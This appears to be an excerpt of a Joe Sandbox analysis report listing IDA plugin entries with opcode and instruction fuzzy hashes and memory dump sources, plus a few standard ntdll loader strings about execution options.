                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cab9439f22aac80a9cc4733bd430449799e796e932c92cec60806f45eadcd95c
                                                                          • Instruction ID: 0c2012342d1cfaa9621be57e435cf558c153837d5c0bd9665fc8f3d6b3f6c36a
                                                                          • Opcode Fuzzy Hash: cab9439f22aac80a9cc4733bd430449799e796e932c92cec60806f45eadcd95c
                                                                          • Instruction Fuzzy Hash: 770124F8B082D0AFE7128B21C144FB877FABB06798F6601E4E8658B5E2D739D940C751
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                          • Instruction ID: 83df92bb89fa5d0c087f5fb5ea8a66b493026c85c6e74c1c4a35250220715851
                                                                          • Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                          • Instruction Fuzzy Hash: ADF0AFB2A05614AFE309CF5CC940F5ABBEEEB45A90F014069E901DB261E671DE05CA98
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d2195cb6ff9d1f3f117b4cd3eafdf991d2c51c0484cd3d28b5271a695e93e8ab
                                                                          • Instruction ID: 2570604b5efe76eec2b3f7a65a1bdd949f486c56cdce7fcb69549e7de7c932b7
                                                                          • Opcode Fuzzy Hash: d2195cb6ff9d1f3f117b4cd3eafdf991d2c51c0484cd3d28b5271a695e93e8ab
                                                                          • Instruction Fuzzy Hash: A11109B0A10249DFDB04DFA9D445B9DBBF4BB08304F1442AAE518EB382EA74D941CB90
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b9115aa2aa16e8eba7b5a187a06175da8d344361d46c91835007424fae265cd7
                                                                          • Instruction ID: 8140aa920f64d64d150e01682e08cc69701462395157061b686a5571f3eef3c3
                                                                          • Opcode Fuzzy Hash: b9115aa2aa16e8eba7b5a187a06175da8d344361d46c91835007424fae265cd7
                                                                          • Instruction Fuzzy Hash: E0F0FC777405806BC73167A28D54F1AA7B7EBD0B94F57046479021F1A0CB55CC01CA94
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5bcd3dfb11ac318a13feca3b838773c90a8976c2253b9a28d744100b3a9c51a4
                                                                          • Instruction ID: c5aecbfed7494718065bf3bb7583642c4cb93cf5aa3446c0103b4d31abf2387c
                                                                          • Opcode Fuzzy Hash: 5bcd3dfb11ac318a13feca3b838773c90a8976c2253b9a28d744100b3a9c51a4
                                                                          • Instruction Fuzzy Hash: F90108B4E00709AFDB04DFA9D545A9EBBF5FF08704F108069A855EB381EB74DA01CBA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9a6d24e76c742d477cd80ba17070e2c31f352f584390bc53f9374245ad7ac9e2
                                                                          • Instruction ID: 116b3d9cbc060bec6987795f83bd9d304a0f72faa5c68ce22c5785c9afff7c76
                                                                          • Opcode Fuzzy Hash: 9a6d24e76c742d477cd80ba17070e2c31f352f584390bc53f9374245ad7ac9e2
                                                                          • Instruction Fuzzy Hash: 1AF0A471B10318AFD704DBB9D409ADEB7B8EF44714F00809AF911FB290DA74D9018B60
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1b06a77e0cc82392e07d9d26aa90fb499c5660c4ececb66dfee87b46def5f2d7
                                                                          • Instruction ID: 1b0608d36198e430b19403560aecb02f8fbdbc44d228455baec3e64bb527e7d6
                                                                          • Opcode Fuzzy Hash: 1b06a77e0cc82392e07d9d26aa90fb499c5660c4ececb66dfee87b46def5f2d7
                                                                          • Instruction Fuzzy Hash: 88017C71A00258AFCF00DFA9D445ADEBBF8AF48314F10005AF500AB380DB74EA01CB94
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bd8cdc661732ba917ba62a2b0dcfcaea88020906e3e2c107cf15261c13e6935f
                                                                          • Instruction ID: f9bcceca66bc5c0c166f73161e4a5d506da5678261337eed7b6e58faa703a03e
                                                                          • Opcode Fuzzy Hash: bd8cdc661732ba917ba62a2b0dcfcaea88020906e3e2c107cf15261c13e6935f
                                                                          • Instruction Fuzzy Hash: 9401F971B17B94AFE711CB14C949F09B3AAEF40761F104141EC149F291E7B4DD50DB86
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d9094b8c0e0c6258773a4d94f691f5c07bcccd706a453715036b0034c324f6df
                                                                          • Instruction ID: c409f82969584760afbbc89e2d3053e30dd0f91b50d2fd2ade4298b6e132a664
                                                                          • Opcode Fuzzy Hash: d9094b8c0e0c6258773a4d94f691f5c07bcccd706a453715036b0034c324f6df
                                                                          • Instruction Fuzzy Hash: ABF0FCB5B253546FEB01C7A48840FDA7BBAAFC0750F0045559D03DF244D730DB40D650
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6204972ff3b380f720e05b2ecc519c88e41dbe2758d314eba0478bbef22976ee
                                                                          • Instruction ID: e7ef960f4fac2bd981fa8a603178c9a754f64e3929146d07aa13e0783c54733c
                                                                          • Opcode Fuzzy Hash: 6204972ff3b380f720e05b2ecc519c88e41dbe2758d314eba0478bbef22976ee
                                                                          • Instruction Fuzzy Hash: B9F04F72A00208BFE711DB64CC41FDAB7FCEB04714F004566A955EB180EAB0EA40CBA4
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 45b32fc71dc4bdb7911730e2a577a5dd3c751d76cd64a1be7b30b5499905479e
                                                                          • Instruction ID: 88b38d5cb28abe2d70ff3940e2e713221e7404f9d79eb25353a91b825b475ebb
                                                                          • Opcode Fuzzy Hash: 45b32fc71dc4bdb7911730e2a577a5dd3c751d76cd64a1be7b30b5499905479e
                                                                          • Instruction Fuzzy Hash: 98F090B7F1221057C2208A59F804B6AA3F5FB84B60F510269F902EB241DA54D803DA94
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 69b35599ff530449455586ac8b25e5a9efa629bda31c6cdd751308438b078674
                                                                          • Instruction ID: 1f362709eab1054a693be0fe9fbd0ac13591f62dcf196b37582b0230fe30141f
                                                                          • Opcode Fuzzy Hash: 69b35599ff530449455586ac8b25e5a9efa629bda31c6cdd751308438b078674
                                                                          • Instruction Fuzzy Hash: 57F0B473F221606AC2309B4AFC1494AF7FAF7E57A1B110A6AF102AB150DFE48443CB94
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 73d22c4d318e0b4c48add1bc56b4b747a29f09626cf117ad01ec8db9dd389f5a
                                                                          • Instruction ID: ba0e3dd174c01e4221c4ab78818e246ea72eabbc563938a4372a1cc07fb075b1
                                                                          • Opcode Fuzzy Hash: 73d22c4d318e0b4c48add1bc56b4b747a29f09626cf117ad01ec8db9dd389f5a
                                                                          • Instruction Fuzzy Hash: B0F05432344559BBDB268F55EC14F973B7BEBD4BA0F104424F6084B1A0DA31DC11D7A4
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d6a04297581aac59768f63668ebe9c51df94fd1ef3ae79eef58bf8edee963ecc
                                                                          • Instruction ID: a39db99c635c10820c8c6b60ed2a8777b0b7dd6d0849e3b890709401754d66d5
                                                                          • Opcode Fuzzy Hash: d6a04297581aac59768f63668ebe9c51df94fd1ef3ae79eef58bf8edee963ecc
                                                                          • Instruction Fuzzy Hash: B3F090B6A05118FFD714CF89C844D9ABBB8EB047A0B11426AB506DB251D670DE00CBE0
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6c2bd5c45be6da09f63ede8618b51cea012fb5cf04e29d20c76e60d7c245bf48
                                                                          • Instruction ID: 7b2ee892e9a9a5826297e19470ed3e70a9ac166ad169c155f902aa81e33f1afa
                                                                          • Opcode Fuzzy Hash: 6c2bd5c45be6da09f63ede8618b51cea012fb5cf04e29d20c76e60d7c245bf48
                                                                          • Instruction Fuzzy Hash: 72F03C74A10248AFDB04DFA8D549A9EB7F4FF08304F504459B805EB380EB74DA00CB54
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 19401c6d88722fd4fba9d8820fe9254d08717b3e6b500efd65fb973b8bd432cc
                                                                          • Instruction ID: c99331d90a3c9bde0561cf777d74aeb35281a7adffda27f1373a1c5d4221ac00
                                                                          • Opcode Fuzzy Hash: 19401c6d88722fd4fba9d8820fe9254d08717b3e6b500efd65fb973b8bd432cc
                                                                          • Instruction Fuzzy Hash: 00E0E2362809C4CFD732CB04C948FA873A1F700B80F8504B0E0094BDB5CBBC9A84EA40
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 03709d6d71206267f39e1a1d74387e03fee686b3819606185ebfbb9edac324f5
                                                                          • Instruction ID: a3dd90f8432a9a373b01b56a0c41317a62f20b41c2d50ff872e9835f1f793d34
                                                                          • Opcode Fuzzy Hash: 03709d6d71206267f39e1a1d74387e03fee686b3819606185ebfbb9edac324f5
                                                                          • Instruction Fuzzy Hash: 28C01232180248BBCB126E81CC00F057B2AEB94B60F008010BA080A5608632E9A0EA88
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 768b791705985fef6bbd48d24f8a2b4910ff65960d9034aae90c2b5012bdc449
                                                                          • Instruction ID: 9fc6192027fbba809b4ff969754ca2a0179825770b106faea3e5210f40a80276
                                                                          • Opcode Fuzzy Hash: 768b791705985fef6bbd48d24f8a2b4910ff65960d9034aae90c2b5012bdc449
                                                                          • Instruction Fuzzy Hash: 40C08C70381B409AEB221B20CD11B103AB4BB50B40F8104A06301D94F0EBB9DC00EA04
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                                                          • Instruction ID: bcb692920bec9fb6ff4ed9e8d1707055dd497e917154128a43e7249388ba2c02
                                                                          • Opcode Fuzzy Hash: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                                                          • Instruction Fuzzy Hash: 2EC08CB82412806AFB1A4B04CD60F2876E6BB00B85F80019CAA011E4A1C7AAE801CA08
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 87b40be69bb84b8935692bbbf804503f40e9112a4bb32ea9a7600e8e15bbdb5b
                                                                          • Instruction ID: d002240c2ae8d8111fed478b39a1d96264239f6da44d555814ab086646cabcd5
                                                                          • Opcode Fuzzy Hash: 87b40be69bb84b8935692bbbf804503f40e9112a4bb32ea9a7600e8e15bbdb5b
                                                                          • Instruction Fuzzy Hash: B6C08C32180248BBC7129A41DC10F057F29E7A0B60F000020B6040A5608532EC60D68C
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                          • Instruction ID: e3bd49f5d6fb30209fa13ba55575f7c006a637840b0543ca15c1c9911d590a15
                                                                          • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                          • Instruction Fuzzy Hash: 26B092383019408FDE06CF29C490F0573E4BB84A84B8500D0E400C7A10D329E800C900
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5fd49143fa49102544c2963eb9d090727d6c92543d1f0f36e433bd1cea946303
                                                                          • Instruction ID: 42abccde3ca4e66caaebfb28e8a19ae5d093f3a970586898d25a06e18b273cb9
                                                                          • Opcode Fuzzy Hash: 5fd49143fa49102544c2963eb9d090727d6c92543d1f0f36e433bd1cea946303
                                                                          • Instruction Fuzzy Hash: F6B01232912440CFCF02DF40C700A1D7333FB40710F194450900017520C238EC03CB40
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0c57ff24fa4c086311998546dce6324c2d2a73001c85b01ffcc1473e47328cd8
                                                                          • Instruction ID: 45b795403c4987a96f5a128a5bec3b53c6a5b1db3d7103c9c9bb57f4e29c4f28
                                                                          • Opcode Fuzzy Hash: 0c57ff24fa4c086311998546dce6324c2d2a73001c85b01ffcc1473e47328cd8
                                                                          • Instruction Fuzzy Hash: A19002A161310042454071594905446601557F13117D1C65AA0544920DC6388859A2A9
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cf5cabcadedca2bddc436791d79b4d420fa86cfdb1d2a5c90aaa8be308e0b1b4
                                                                          • Instruction ID: 99cc8de47c5f4a40ade7b49a6c90a3adfe208956ab5477fd3033b0c0f6c4a588
                                                                          • Opcode Fuzzy Hash: cf5cabcadedca2bddc436791d79b4d420fa86cfdb1d2a5c90aaa8be308e0b1b4
                                                                          • Instruction Fuzzy Hash: 6790027121300142994062595905A8E411547F1312FD1D95AA0005914DC93488656261
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 499a0f13f561ee784a7efe9a902f3fd91fa7deaddb522eab4a77129ff6ace91e
                                                                          • Instruction ID: be2375ddef745d6393ccf75f7d8522d748c36689cba48f45f3e7a1b59fbcee80
                                                                          • Opcode Fuzzy Hash: 499a0f13f561ee784a7efe9a902f3fd91fa7deaddb522eab4a77129ff6ace91e
                                                                          • Instruction Fuzzy Hash: A690027521300402D91061595905686005647E0311F91D956A0414918EC67488A5B161
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8855b2964225d8a934a2634144fb5fad354cd3ab2edb7134da5dbea602e52a1b
                                                                          • Instruction ID: aee0b53434ad5ff2b28d23e8b4bffbb3a47a9ea586fd3360499f792bd7a69262
                                                                          • Opcode Fuzzy Hash: 8855b2964225d8a934a2634144fb5fad354cd3ab2edb7134da5dbea602e52a1b
                                                                          • Instruction Fuzzy Hash: BE90026125705102D550715D4505656401567F0211F91C566A0804954EC57588597261

                                                                          Control-flow Graph

                                                                          Strings
                                                                          • Execute=1, xrefs: 3575451E
                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 35754592
                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 35754530
                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3575454D
                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 35754460
                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 35754507
                                                                          • ExecuteOptions, xrefs: 357544AB
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                          • API String ID: 0-484625025
                                                                          • Opcode ID: e8817cfd5dbf74acf19b512a0d137c62fcad18399086439f5ea2ed6f9c5e2937
